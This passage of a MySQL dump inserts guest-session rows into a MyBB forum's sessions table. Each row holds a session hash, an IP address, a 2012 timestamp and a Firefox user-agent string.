('a3f42c47585b45a3876b2c9ffc0bd80a', '0', '105.216.198.80', '1352771836', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('437ad25e4bcb6ad586cc2cacb47bca43', '0', '151.91.75.100', '1352771837', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2baf64c10268416eb54ff0aa4b283265', '0', '3.169.238.212', '1352771841', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('69afb1a1e9900f3d4b4ab090a756a2e9', '0', '17.172.241.160', '1352771847', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1b49fe83aae5fafb53e67461b4ca64b0', '0', '63.221.15.66', '1352771848', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('007b8581dcf713dcdfb93e59f8e21d9c', '0', '113.199.158.213', '1352771849', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7b7ff9dc5f9bd9362f662c41a6c1a953', '0', '237.168.250.57', '1352771851', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('622eca23d67314bcc0de6e867239a104', '0', '242.117.203.174', '1352771853', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('413bb73a758d36dd1aa1fc284d89bbe4', '0', '226.1.150.88', '1352771853', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('479ddf34e1e4a633799c1a857ab3cfb1', '0', '16.59.155.151', '1352771854', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('298f8a7e6ae8c6d1c90cba326ffad17a', '0', '57.119.82.62', '1352771855', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('87d938cd46a1d2d6cc3f83714f95e839', '0', '162.90.28.71', '1352771857', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('96635669b88cb574f68b66548c60b767', '0', '233.58.206.223', '1352771858', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3c40166595231f4960407d8030b7b763', '0', '99.1.234.170', '1352771858', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ad81b30bace3edf8c6cfb183a77043b3', '0', '82.77.152.130', '1352771859', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b0a429348306a9b5e41b0a04e77116d5', '0', '82.72.174.59', '1352771860', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d8365be7184d129c7593a2ea9bb45687', '0', '240.42.54.233', '1352771861', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('47d7dbb9e949118405405888bcdd9938', '0', '101.147.233.73', '1352771862', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('53976d76d9c6b8bf97abe194e68add8a', '0', '214.177.144.19', '1352771865', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('332c13d92a952ed6390c862a1e45e0c4', '0', '20.162.13.132', '1352771866', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('46a9212d9d250690d17039069fa4094f', '0', '58.112.181.235', '1352771868', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cd9028734f9ef5c9cbc8f0a9912997f0', '0', '4.190.204.114', '1352771869', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a99cffc5ac9a130dac84a737cbff117d', '0', '132.205.84.142', '1352771871', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8d86fb310f7a2d85984caf36dcb21816', '0', '112.61.192.3', '1352771872', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6ee2a0860f5a2eacfe15dbffd8782794', '0', '41.91.210.47', '1352771874', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5f009552f2f399bfd6de25cd15ad2f08', '0', '192.70.253.246', '1352771875', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('05585de6d21c31b96d5e1a12895a16db', '0', '123.229.91.62', '1352771876', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ed96660cdf894f54abb3d3b6f6e08b07', '0', '54.194.252.127', '1352771877', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cac08498a9dce87aaeb451dc18405331', '0', '255.231.144.208', '1352771879', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1f634694c4cbb00e5f65083bd0834748', '0', '170.251.108.9', '1352771879', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7b6ef8ddabfad7e22788ac53fbf5472d', '0', '208.221.147.30', '1352771881', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9fed7ab819d3701c9f2ac02ffcbd4ede', '0', '25.32.60.25', '1352771881', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a4c20b0a605974131dadbe26f44c69f1', '0', '229.149.255.112', '1352771882', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('be19a8efb32c72b949699fe571b3e43f', '0', '189.81.116.66', '1352771884', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5c2790f9d299de95e80e56d38d39dea1', '0', '89.225.185.113', '1352771887', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ae67fad453cb8c97b08b767612e13064', '0', '231.144.204.77', '1352771887', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('937917ffa551b65c9ba830fd870a7a08', '0', '75.9.245.114', '1352771888', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('69d024fa76b3708ca44e3f257b157e4c', '0', '59.134.250.12', '1352771891', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4787220c95b516f811a3903b0734aecb', '0', '15.84.10.221', '1352771893', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7b7d12af2d933c40cd74eb99f113dec0', '0', '197.179.67.205', '1352771893', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4554563d6e3f3502bffabe733e64b0af', '0', '195.130.167.87', '1352771894', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4b82fe04576d5121571aa87ec86021a1', '0', '100.138.153.8', '1352771895', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ffe591a6783a5d4f2ef741fa0836197c', '0', '146.166.27.92', '1352771895', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d3dc60ec9e5fa1e70b1b5fa9407f261f', '0', '84.184.67.174', '1352771897', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('929fe6c346b485f142c551bde8872433', '0', '216.254.231.217', '1352771898', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d50aa5bb84cf3b4786d7676d8f655d5e', '0', '179.19.246.185', '1352771899', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bb54fa4cf9c3b7c31fad07198330f1fa', '0', '224.97.198.72', '1352771899', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cfa74b1316f663ba4832a0a306243b78', '0', '230.101.200.8', '1352771901', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('686f8a0d89fba01656e6faed0f85efe5', '0', '225.69.5.215', '1352771902', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f0988f1042db05971e89f18641a858d4', '0', '135.123.110.179', '1352771905', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fe3475adb0cfb2fdba79332c93134655', '0', '209.139.27.47', '1352771908', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1c4c4122e4297eaf279800d251b29e6a', '0', '54.82.232.171', '1352771909', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8037d52fdec222906f2bb9c11bf05c5d', '0', '40.56.234.46', '1352771911', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7882e5f0c7bea3e8250982aedf30b549', '0', '217.124.194.42', '1352771913', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b500a18eb164a790bc56ccaba73b4ead', '0', '255.94.164.66', '1352771914', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7e0b4d8191c56e0b94e1068ca3f008e9', '0', '79.30.182.183', '1352771915', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d6e3a7f580478917a46bb2aaaba2021d', '0', '94.189.43.4', '1352771916', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('22aaefe777dfffe37f63f806d9a5a5f2', '0', '152.131.32.247', '1352771917', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4287b45621544cbea8e9a6f08df28304', '0', '89.221.187.72', '1352771918', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('01d289dd190ef4cec7dcd813b6d05470', '0', '176.206.30.130', '1352771919', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8397def0c2de8a59a3393ae1f6c89371', '0', '243.239.216.116', '1352771920', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('70cf0b4230ecb43bd2f905689f10c75a', '0', '164.143.28.52', '1352771920', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('08a1beb76c82fdff19f08dee0530706e', '0', '199.156.96.218', '1352771921', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d30c4cf164f8cf9918155b1aa0ff8cac', '0', '93.186.167.134', '1352771923', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b9e99e2ec0d3bd01f5f97b3729c76f7c', '0', '200.180.229.205', '1352771925', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('07c44409ee36f793719cea299c18c704', '0', '78.175.26.235', '1352771927', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3bd2ab4ca8099d5ccfbb7baf5ae375f7', '0', '170.44.59.162', '1352771928', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('76fadb4530ba80617d071386e0e07ac4', '0', '108.28.186.43', '1352771930', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c6b53b8570c11b8e0eb7e95ac32de837', '0', '107.176.89.233', '1352771930', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('12d877561c30d0626caf92ab00f67825', '0', '28.106.41.85', '1352771935', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a570f26bcf1768989ba126dc3f03c564', '0', '23.213.215.210', '1352771936', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('75d46922d8776e66565763f550f92fea', '0', '129.20.53.136', '1352771936', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ce8c0818bdf4e39e6419125f95ff184f', '0', '211.174.168.151', '1352771938', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c8dd116abf70f094f8ca8466435af8f8', '0', '205.242.31.28', '1352771939', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ea1bf25d91fe1847377cf5b4e60933cc', '0', '175.51.159.65', '1352771940', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a61a79b1758cba8645239d85159e0ee8', '0', '251.152.75.86', '1352771942', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('387f1350e876b8326fd665a194a8f360', '0', '229.150.94.165', '1352771943', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6c8124fcc769216c7f7d5c9a7dbcc92f', '0', '78.126.50.100', '1352771945', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ad226939095b9a77a7747d7337ef3fff', '0', '227.94.40.49', '1352771946', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3cdf05baedf3f39f6114cd74813eca07', '0', '23.39.236.153', '1352771947', 